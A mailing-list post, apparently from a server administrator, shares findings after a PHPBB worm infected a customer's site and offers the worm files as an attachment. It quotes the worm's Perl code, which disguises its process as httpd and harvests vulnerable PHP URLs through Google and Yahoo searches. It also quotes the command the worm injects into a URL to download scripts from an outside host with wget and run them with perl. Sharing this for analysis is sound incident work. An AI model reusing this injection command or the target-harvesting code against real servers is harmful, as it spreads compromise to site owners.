Hello,
I discovered tonight that a copy of the PHPBB worm had broken in through
a script a customer was running and was busy running around googling and
generating lists of sites. There have been a couple of intrusions but
they appear to be the same version. I thought I'd pass on the files that
were on the server in case anyone is interested.
The processes that were left running were called:
/usr/local/sbin/httpd - spy
which is the process name from php.txt:
my $processo = "/usr/local/sbin/httpd - spy";
This file contains the component that talks to Google:
$procura = 'inurl:*.php?*=' . $numr;
for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80,
Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
and then parses the results for URLs :)
It also gets them from Yahoo!:
for($cadenu=1;$cadenu <= 991; $cadenu +=10){
@cade =
get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu";)
or next;
The basis for all of these worms is:
$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget
www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget
www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl
php.txt';
I've included copies of these in the tarball so people can look for
themselves :)
Happy holidays.
Colin.
--
If jugglers juggle.
And Smugglers smuggle.
Then what else can a snuggler do :)
Attachment:
phpbbworm.tar.gz
Description: application/tar-gz